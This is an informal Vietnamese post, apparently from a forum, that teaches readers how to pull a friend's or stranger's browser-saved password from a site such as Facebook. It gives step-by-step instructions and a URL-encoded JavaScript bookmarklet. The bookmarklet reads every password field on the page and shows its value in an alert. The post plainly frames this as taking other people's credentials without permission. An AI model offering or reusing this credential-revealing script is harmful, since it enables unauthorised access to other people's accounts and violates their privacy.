đây là 1 mã javascript đơn jản để xem passwords dưới dạng *********. một ngày nào đó khi mà bạn vọc đc vào máy tính của thằng bạn hay thằng nào đó ^^...và nó có save password trên trình duyệt....và bạn muốn lấy pass của nó ? vậy hãy làm theo cách dưới đây:

1) Mở trang web mà bạn muốn lấy password như facebook hoặc kist chẳng hạn ( lưu ý là nên mở bằng trình duyệt IE hoặc Chrome....FireFox ko chạy đc mã java này)

2) copy đoạn code này vào thanh URL:
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j<F.length ;%20++j)
%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22Passwords%20in%20forms%20on%20th is
%20page:\n\n%22%20+%20s);%20else%20alert(%22There% 20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})();
Chú ý là fải gõ tay chữ javascript: trên thanh URL vì mã này ko paste đc trên đó


3) gõ Enter thử coi :|

Sẽ có 1 bảng hiện ra và cho bạn cái pass :))